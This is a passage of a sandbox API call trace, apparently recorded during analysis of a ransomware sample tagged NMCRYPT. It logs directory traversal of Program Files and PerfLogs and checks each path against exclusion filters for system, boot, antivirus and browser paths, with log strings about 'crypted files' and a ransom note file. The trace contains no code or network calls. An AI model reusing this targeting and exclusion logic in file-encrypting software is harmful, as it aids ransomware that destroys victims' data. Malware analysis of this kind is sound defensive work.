Settings\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*\\java\\*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*\\windows\\*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*\\ESET\\*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*\\AVG\\*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*Atheros*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*Realtek*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*bootmgr*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*boot*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*boot*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*IO.SYS*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*ntldr*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*chrome*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*opera*") returned 0 [0143.258] PathMatchSpecW (pszFile="C:\\Documents and Settings\\*", pszSpec="*firefox*") returned 0 [0143.258] wcslen (_String="\\\\?\\") returned 0x4 [0143.258] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 0xffffffff [0143.259] GetLastError () returned 0x5 [0143.259] wcslen (_String="Invalid handle (Error code: 0x") returned 0x1e [0143.259] wcslen (_String=")") returned 0x1 [0143.259] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.259] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.259] wcslen (_String="\\\\?\\") returned 0x4 [0143.259] wcslen (_String="\\") returned 0x1 [0143.259] wcslen (_String="Target directory ") returned 0x11 [0143.259] wcslen (_String=" -> ") returned 0x4 [0143.259] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.259] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.259] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.259] wcslen (_String="\\*") returned 0x2 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*.exe") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*.dll") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*.lnk") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*.bat") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*.ini") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*.msi") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*.scf") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*pagefile.sys*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*AppData*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*\\winrar\\*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*\\java\\*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*\\windows\\*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*\\ESET\\*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*\\AVG\\*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*Atheros*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*Realtek*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*bootmgr*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*boot*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*boot*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*IO.SYS*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.259] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.260] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*ntldr*") returned 0 [0143.260] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*chrome*") returned 0 [0143.260] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*opera*") returned 0 [0143.260] PathMatchSpecW (pszFile="C:\\PerfLogs\\*", pszSpec="*firefox*") returned 0 [0143.260] wcslen (_String="\\\\?\\") returned 0x4 [0143.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 0x8be8f8 [0143.260] wcscmp (_String1=".", _String2=".") returned 0 [0143.260] FindNextFileW (in: hFindFile=0x8be8f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.260] wcscmp (_String1="..", _String2=".") returned 1 [0143.260] wcscmp (_String1="..", _String2="..") returned 0 [0143.260] FindNextFileW (in: hFindFile=0x8be8f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 0 [0143.260] GetLastError () returned 0x12 [0143.260] FindClose (in: hFindFile=0x8be8f8 | out: hFindFile=0x8be8f8) returned 1 [0143.260] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0143.260] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.260] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.260] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0143.260] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.260] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.260] wcslen (_String="\\\\?\\") returned 0x4 [0143.260] wcslen (_String="\\") returned 0x1 [0143.260] wcslen (_String="Target directory ") returned 0x11 [0143.260] wcslen (_String=" -> ") returned 0x4 [0143.260] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.260] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.260] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.260] wcslen (_String="\\*") returned 0x2 [0143.260] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*.exe") returned 0 [0143.260] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*.dll") returned 0 [0143.260] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*.lnk") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*.bat") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*.ini") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*.msi") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*.scf") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*pagefile.sys*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*AppData*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*\\winrar\\*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*\\java\\*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*\\windows\\*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*\\ESET\\*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*\\AVG\\*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*Atheros*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*Realtek*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*bootmgr*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*boot*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*boot*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*IO.SYS*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*ntldr*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*chrome*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*opera*") returned 0 [0143.261] PathMatchSpecW (pszFile="C:\\Program Files\\*", pszSpec="*firefox*") returned 0 [0143.261] wcslen (_String="\\\\?\\") returned 0x4 [0143.261] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\*", lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 0x8be6f8 [0143.261] wcscmp (_String1=".", _String2=".") returned 0 [0143.261] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.261] wcscmp (_String1="..", _String2=".") returned 1 [0143.261] wcscmp (_String1="..", _String2="..") returned 0 [0143.261] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.261] wcscmp (_String1="Common Files", _String2=".") returned 1 [0143.261] wcscmp (_String1="Common Files", _String2="..") returned 1 [0143.261] wcslen (_String="\\") returned 0x1 [0143.261] wcslen (_String="Common Files") returned 0xc [0143.262] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.262] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*NMCRYPT") returned 0 [0143.262] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*Recovers your files.html") returned 0 [0143.262] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.exe") returned 0 [0143.262] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.dll") returned 0 [0143.262] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.lnk") returned 0 [0143.262] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.bat") returned 0 [0143.262] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.ini") returned 1 [0143.262] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.262] wcscmp (_String1="Internet Explorer", _String2=".") returned 1 [0143.262] wcscmp (_String1="Internet Explorer", _String2="..") returned 1 [0143.262] wcslen (_String="\\") returned 0x1 [0143.262] wcslen (_String="Internet Explorer") returned 0x11 [0143.262] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.262] wcscmp (_String1="Java", _String2=".") returned 1 [0143.262] wcscmp (_String1="Java", _String2="..") returned 1 [0143.262] wcslen (_String="\\") returned 0x1 [0143.262] wcslen (_String="Java") returned 0x4 [0143.262] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.262] wcscmp (_String1="Microsoft Office", _String2=".") returned 1 [0143.262] wcscmp (_String1="Microsoft Office", _String2="..") returned 1 [0143.262] wcslen (_String="\\") returned 0x1 [0143.262] wcslen (_String="Microsoft Office") returned 0x10 [0143.262] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.262] wcscmp (_String1="Microsoft Office 15", _String2=".") returned 1 [0143.262] wcscmp (_String1="Microsoft Office 15", _String2="..") returned 1 [0143.262] wcslen (_String="\\") returned 0x1 [0143.262] wcslen (_String="Microsoft Office 15") returned 0x13 [0143.263] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.263] wcscmp (_String1="MSBuild", _String2=".") returned 1 [0143.263] wcscmp (_String1="MSBuild", _String2="..") returned 1 [0143.263] wcslen (_String="\\") returned 0x1 [0143.263] wcslen (_String="MSBuild") returned 0x7 [0143.263] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.263] wcscmp (_String1="Reference Assemblies", _String2=".") returned 1 [0143.263] wcscmp (_String1="Reference Assemblies", _String2="..") returned 1 [0143.263] wcslen (_String="\\") returned 0x1 [0143.263] wcslen (_String="Reference Assemblies") returned 0x14 [0143.263] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.263] wcscmp (_String1="Uninstall Information", _String2=".") returned 1 [0143.263] wcscmp (_String1="Uninstall Information", _String2="..") returned 1 [0143.263] wcslen (_String="\\") returned 0x1 [0143.263] wcslen (_String="Uninstall Information") returned 0x15 [0143.263] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.263] wcscmp (_String1="Windows Defender", _String2=".") returned 1 [0143.263] wcscmp (_String1="Windows Defender", _String2="..") returned 1 [0143.263] wcslen (_String="\\") returned 0x1 [0143.263] wcslen (_String="Windows Defender") returned 0x10 [0143.263] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.264] wcscmp (_String1="Windows Journal", _String2=".") returned 1 [0143.264] wcscmp (_String1="Windows Journal", _String2="..") returned 1 [0143.264] wcslen (_String="\\") returned 0x1 [0143.264] wcslen (_String="Windows Journal") returned 0xf [0143.264] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.264] wcscmp (_String1="Windows Mail", _String2=".") returned 1 [0143.264] wcscmp (_String1="Windows Mail", _String2="..") returned 1 [0143.264] wcslen (_String="\\") returned 0x1 [0143.264] wcslen (_String="Windows Mail") returned 0xc [0143.264] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.264] wcscmp (_String1="Windows Media Player", _String2=".") returned 1 [0143.264] wcscmp (_String1="Windows Media Player", _String2="..") returned 1 [0143.264] wcslen (_String="\\") returned 0x1 [0143.264] wcslen (_String="Windows Media Player") returned 0x14 [0143.264] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.264] wcscmp (_String1="Windows Multimedia Platform", _String2=".") returned 1 [0143.264] wcscmp (_String1="Windows Multimedia Platform", _String2="..") returned 1 [0143.264] wcslen (_String="\\") returned 0x1 [0143.264] wcslen (_String="Windows Multimedia Platform") returned 0x1b [0143.264] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.264] wcscmp (_String1="Windows NT", _String2=".") returned 1 [0143.264] wcscmp (_String1="Windows NT", _String2="..") returned 1 [0143.264] wcslen (_String="\\") returned 0x1 [0143.264] wcslen (_String="Windows NT") returned 0xa [0143.264] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.264] wcscmp (_String1="Windows Photo Viewer", _String2=".") returned 1 [0143.265] wcscmp (_String1="Windows Photo Viewer", _String2="..") returned 1 [0143.265] wcslen (_String="\\") returned 0x1 [0143.265] wcslen (_String="Windows Photo Viewer") returned 0x14 [0143.265] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.265] wcscmp (_String1="Windows Portable Devices", _String2=".") returned 1 [0143.265] wcscmp (_String1="Windows Portable Devices", _String2="..") returned 1 [0143.265] wcslen (_String="\\") returned 0x1 [0143.265] wcslen (_String="Windows Portable Devices") returned 0x18 [0143.265] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.265] wcscmp (_String1="Windows Sidebar", _String2=".") returned 1 [0143.265] wcscmp (_String1="Windows Sidebar", _String2="..") returned 1 [0143.265] wcslen (_String="\\") returned 0x1 [0143.265] wcslen (_String="Windows Sidebar") returned 0xf [0143.265] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.265] wcscmp (_String1="WindowsApps", _String2=".") returned 1 [0143.265] wcscmp (_String1="WindowsApps", _String2="..") returned 1 [0143.265] wcslen (_String="\\") returned 0x1 [0143.265] wcslen (_String="WindowsApps") returned 0xb [0143.265] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 1 [0143.265] wcscmp (_String1="WindowsPowerShell", _String2=".") returned 1 [0143.265] wcscmp (_String1="WindowsPowerShell", _String2="..") returned 1 [0143.265] wcslen (_String="\\") returned 0x1 [0143.265] wcslen (_String="WindowsPowerShell") returned 0x11 [0143.266] FindNextFileW (in: hFindFile=0x8be6f8, lpFindFileData=0x2d7f73c | out: lpFindFileData=0x2d7f73c) returned 0 [0143.266] GetLastError () returned 0x12 [0143.266] FindClose (in: hFindFile=0x8be6f8 | out: hFindFile=0x8be6f8) returned 1 [0143.266] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0143.266] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.266] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.266] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0143.266] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.266] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.266] wcslen (_String="\\\\?\\") returned 0x4 [0143.266] wcslen (_String="\\") returned 0x1 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*.exe") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*.dll") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*.lnk") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*.bat") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*.ini") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*.msi") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*.scf") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*pagefile.sys*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*AppData*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*\\winrar\\*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*\\java\\*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*\\windows\\*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*\\ESET\\*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*\\AVG\\*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*Atheros*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*Realtek*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*bootmgr*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*boot*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*boot*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*IO.SYS*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.267] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*ntldr*") returned 0 [0143.267] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*chrome*") returned 0 [0143.267] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*opera*") returned 0 [0143.267] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\*", pszSpec="*firefox*") returned 0 [0143.267] wcslen (_String="\\\\?\\") returned 0x4 [0143.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\*", lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 0x8be2f8 [0143.267] wcscmp (_String1=".", _String2=".") returned 0 [0143.267] FindNextFileW (in: hFindFile=0x8be2f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0143.267] wcscmp (_String1="..", _String2=".") returned 1 [0143.267] wcscmp (_String1="..", _String2="..") returned 0 [0143.267] FindNextFileW (in: hFindFile=0x8be2f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0143.267] wcscmp (_String1="DESIGNER", _String2=".") returned 1 [0143.267] wcscmp (_String1="DESIGNER", _String2="..") returned 1 [0143.267] FindNextFileW (in: hFindFile=0x8be2f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0143.267] wcscmp (_String1="microsoft shared", _String2=".") returned 1 [0143.267] wcscmp (_String1="microsoft shared", _String2="..") returned 1 [0143.267] FindNextFileW (in: hFindFile=0x8be2f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0143.267] wcscmp (_String1="Services", _String2=".") returned 1 [0143.267] wcscmp (_String1="Services", _String2="..") returned 1 [0143.267] FindNextFileW (in: hFindFile=0x8be2f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0143.267] wcscmp (_String1="System", _String2=".") returned 1 [0143.267] wcscmp (_String1="System", _String2="..") returned 1 [0143.267] FindNextFileW (in: hFindFile=0x8be2f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 0 [0143.267] GetLastError () returned 0x12 [0143.267] FindClose (in: hFindFile=0x8be2f8 | out: hFindFile=0x8be2f8) returned 1 [0143.267] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0143.267] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.267] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.267] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0143.267] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.267] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.267] wcslen (_String="\\\\?\\") returned 0x4 [0143.270] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*.exe") returned 0 [0143.270] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*.dll") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*.lnk") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*.bat") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*.ini") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*.msi") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*.scf") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*pagefile.sys*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*AppData*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*\\winrar\\*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*\\java\\*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*\\windows\\*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*\\ESET\\*") returned 0 [0143.271] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\DESIGNER\\*", pszSpec="*\\AVG\\*") returned 0 